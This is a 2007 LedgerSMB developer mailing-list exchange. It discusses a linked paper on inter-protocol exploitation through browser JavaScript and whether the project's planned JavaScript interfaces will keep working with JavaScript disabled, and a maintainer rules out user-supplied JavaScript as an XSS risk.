Hi Chris; I have been following this issue. I can tell you that we are not looking at allowing users to add their own Javascript to pages. This is just one example of what user-defined Javascript can do. In general, we do not think that it is a good security practice to allow users of the application to run arbitrary code in other peoples' web browsers.
This looks like a subtype fo XSS attacks and we take these seriously. Best Wishes, Chris Travers On 4/19/07, Chris Bennett <[EMAIL PROTECTED]> wrote: > http://www.ngssoftware.com/research/papers/InterProtocolExploitation.pdf > > Summary: A way of exploiting web browsers located within the security > perimeter (i.e access to internal network) > using something like javascript from an external web page to launch > a buffer overflow attack on internal network. > Seems like problems like this could have have serious implications > against many applications that are badly written but thought safe since > not exposed to Internet. > Obviously LSMB would not be susceptible to buffer overflows, but every > day I see more and more seriously negative stuff about javascript. > My understanding is that LSMB development is going to add a lot of > javascript based web 2.0/ajax type stuff, which IS wonderful to use. > Are there plans for the new interfaces to "degrade gracefully" without > loss of function (some loss of convenience couldn't be avoided), if a > person found that javascript HAD to be turned off and kept off because > of non-LSMB security issues? > > Chris Bennett > > > ------------------------------------------------------------------------- > This SF.net email is sponsored by DB2 Express > Download DB2 Express C - the FREE version of DB2 express and take > control of your XML. No limits. Just data. Click to get it now. > http://sourceforge.net/powerbar/db2/ > _______________________________________________ > Ledger-smb-devel mailing list > [email protected] > https://lists.sourceforge.net/lists/listinfo/ledger-smb-devel > ------------------------------------------------------------------------- This SF.net email is sponsored by DB2 Express Download DB2 Express C - the FREE version of DB2 express and take control of your XML. No limits. Just data. Click to get it now. http://sourceforge.net/powerbar/db2/ _______________________________________________ Ledger-smb-devel mailing list [email protected] https://lists.sourceforge.net/lists/listinfo/ledger-smb-devel
